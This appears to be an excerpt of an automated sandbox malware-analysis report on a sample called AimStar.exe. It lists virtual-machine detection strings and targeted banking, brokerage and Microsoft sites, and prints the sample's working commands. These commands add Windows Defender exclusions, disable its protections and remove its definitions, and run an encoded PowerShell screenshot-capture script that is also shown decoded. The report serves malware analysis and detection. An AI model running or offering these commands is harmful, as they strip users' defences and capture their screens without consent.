              Source: AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxservice
              Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: AimStar.exe, 00000002.00000003.2056720050.000002020CCD7000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2410298641.000002020CCD7000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2054308282.000002020CCD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWn
              Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: SIHClient.exe, 0000003C.00000003.2211083739.000001B10EE31000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 0000003C.00000003.2515221982.000001B10EE31000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 0000003C.00000003.2208913842.000001B10EE31000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 0000003C.00000002.2516056869.000001B10EE31000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 0000003C.00000003.2214000099.000001B10EE31000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000040.00000002.2189796166.0000027DE9624000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000040.00000003.2188342279.0000027DE95FA000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000040.00000003.2188661666.0000027DE960E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmsrvc
              Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: decodeqemu-ga
              Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: f15vmsrvc
              Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: SIHClient.exe, 0000003C.00000003.2514336802.000001B10EDE5000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 0000003C.00000003.2210012229.000001B10EDE9000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 0000003C.00000002.2516056869.000001B10EDE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
              Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qemu-ga
              Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
              Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmusrvc
              Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 9K~]f8vmware
              Source: AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmware)
              Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: rar.exe, 00000058.00000003.2314221897.00000224E3E57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fqEmUt
              Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
              Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareuser
              Source: getmac.exe, 00000040.00000003.2188342279.0000027DE95FA000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000040.00000003.2188661666.0000027DE960E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
              Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: SIHClient.exe, 0000003C.00000003.2211083739.000001B10EE31000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 0000003C.00000003.2515221982.000001B10EE31000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 0000003C.00000003.2208913842.000001B10EE31000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 0000003C.00000002.2516056869.000001B10EE31000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 0000003C.00000003.2214000099.000001B10EE31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%
              Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwaretray
              Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: f4vmusrvc
              Source: AimStar.exe, 00000002.00000002.2413694287.000002020D72C000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2216900898.000002020D2D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
              Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: AimStar.exe, 00000002.00000003.2054517827.000002020C643000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW!
              Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxtray
              Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: getmac.exe, 00000040.00000003.2187820640.0000027DE963F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000040.00000002.2189796166.0000027DE9647000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000040.00000003.2188342279.0000027DE9644000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
              Source: getmac.exe, 00000040.00000002.2189796166.0000027DE9624000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000040.00000003.2188342279.0000027DE95FA000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000040.00000003.2188661666.0000027DE960E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAW
              Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: getmac.exe, 00000040.00000003.2187820640.0000027DE963F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000040.00000002.2189796166.0000027DE9647000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000040.00000003.2188342279.0000027DE9644000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
              Source: AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmtoolsd
              Source: AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareservicerc
              Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F4D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF710F4D19C
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A8200330 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,2_2_00007FF8A8200330
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F634F0 GetProcessHeap,0_2_00007FF710F634F0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F4D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF710F4D19C
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F4D37C SetUnhandledExceptionFilter,0_2_00007FF710F4D37C
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F5A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF710F5A684
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F4C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF710F4C910
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F4D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF710F4D19C
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F4D37C SetUnhandledExceptionFilter,2_2_00007FF710F4D37C
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F5A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF710F5A684
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F4C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF710F4C910
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A8153248 IsProcessorFeaturePresent,00007FF8BFAC1A90,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FF8BFAC1A90,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8A8153248
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139AB6D8 SetUnhandledExceptionFilter,88_2_00007FF7139AB6D8
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139AA66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,88_2_00007FF7139AA66C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139AB52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,88_2_00007FF7139AB52C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139B4C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,88_2_00007FF7139B4C10

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
